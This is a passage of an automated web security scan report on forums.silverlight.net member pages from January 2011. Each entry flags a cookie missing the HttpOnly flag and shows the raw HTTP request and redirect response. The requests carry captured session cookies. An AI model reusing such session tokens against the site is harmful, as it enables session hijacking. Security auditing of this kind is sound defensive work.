<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFredrik_5F0
...[SNIP]...

17.218. http://forums.silverlight.net/members/Furukoo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/Furukoo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Furukoo.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 235
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFurukoo.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFurukoo.asp
...[SNIP]...

17.219. http://forums.silverlight.net/members/GFR_5F00_2009.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/GFR_5F00_2009.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:33 GMT; expires=Sun, 29-Jan-2012 23:16:33 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/GFR_5F00_2009.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 241
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGFR_5F00_2009.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:33 GMT; expires=Sun, 29-Jan-2012 23:16:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:33 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGFR_5F00_20
...[SNIP]...

17.220. http://forums.silverlight.net/members/Gaz3ll.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/Gaz3ll.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:00 GMT; expires=Sun, 29-Jan-2012 23:17:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Gaz3ll.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGaz3ll.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:00 GMT; expires=Sun, 29-Jan-2012 23:17:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:59 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGaz3ll.aspx
...[SNIP]...

17.221. http://forums.silverlight.net/members/Jonathan-Shen-_1320_-MSFT.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/Jonathan-Shen-_1320_-MSFT.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Jonathan-Shen-_1320_-MSFT.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 253
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fJonathan-Shen-_1320_-MSFT.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fJonathan-Sh
...[SNIP]...

17.222. http://forums.silverlight.net/members/MF_5F00_MiEK.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/MF_5F00_MiEK.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:03 GMT; expires=Sun, 29-Jan-2012 23:17:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/MF_5F00_MiEK.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 240
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMF_5F00_MiEK.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:03 GMT; expires=Sun, 29-Jan-2012 23:17:03 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:02 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMF_5F00_MiE
...[SNIP]...

17.223. http://forums.silverlight.net/members/MisterGoodcat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/MisterGoodcat.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/MisterGoodcat.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 241
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMisterGoodcat.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMisterGoodc
...[SNIP]...

17.224. http://forums.silverlight.net/members/Shi-Ding-_2D00_-MSFT.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/Shi-Ding-_2D00_-MSFT.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Shi-Ding-_2D00_-MSFT.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 248
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fShi-Ding-_2D00_-MSFT.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:00 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fShi-Ding-_2
...[SNIP]...

17.225. http://forums.silverlight.net/members/Skyrunner.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/Skyrunner.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:17 GMT; expires=Sun, 29-Jan-2012 23:16:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Skyrunner.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fSkyrunner.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:17 GMT; expires=Sun, 29-Jan-2012 23:16:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:18 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fSkyrunner.a
...[SNIP]...

17.226. http://forums.silverlight.net/members/TimeBandit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/TimeBandit.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:27 GMT; expires=Sun, 29-Jan-2012 23:16:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/TimeBandit.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fTimeBandit.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:27 GMT; expires=Sun, 29-Jan-2012 23:16:27 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:28 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fTimeBandit.
...[SNIP]...

17.227. http://forums.silverlight.net/members/Xpert360.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/Xpert360.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:01 GMT; expires=Sun, 29-Jan-2012 23:17:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Xpert360.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 236
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fXpert360.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:01 GMT; expires=Sun, 29-Jan-2012 23:17:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:01 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fXpert360.as
...[SNIP]...

17.228. http://forums.silverlight.net/members/_2D002D00_Will_2D002D00_.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/_2D002D00_Will_2D002D00_.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/_2D002D00_Will_2D002D00_.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 252
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2f_2D002D00_Will_2D002D00_.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2f_2D002D00_W
...[SNIP]...

17.229. http://forums.silverlight.net/members/abeaulieu.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/abeaulieu.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:01 GMT; expires=Sun, 29-Jan-2012 23:16:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/abeaulieu.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fabeaulieu.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:01 GMT; expires=Sun, 29-Jan-2012 23:16:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:01 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fabeaulieu.a
...[SNIP]...

17.230. http://forums.silverlight.net/members/alt_5F00_fo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/alt_5F00_fo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/alt_5F00_fo.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 239
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2falt_5F00_fo.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
